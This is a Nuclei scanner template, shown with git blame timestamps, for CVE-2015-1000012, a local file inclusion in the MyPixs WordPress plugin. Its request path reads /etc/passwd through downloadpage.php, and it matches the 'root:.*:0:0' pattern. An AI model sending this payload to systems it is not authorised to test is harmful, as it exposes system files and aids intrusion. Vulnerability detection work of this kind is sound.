nuclei-templates/cves/2015/CVE-2015-1000012.yaml

26 lines
636 B
YAML
Raw Normal View History

2021-07-14 11:10:41 +00:00
id: CVE-2015-1000012
info:
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
author: daffainfo
severity: high
reference:
2021-07-14 13:56:20 +00:00
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
2021-07-14 11:10:41 +00:00
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-07-14 11:10:41 +00:00
part: body
- type: status
status:
- 200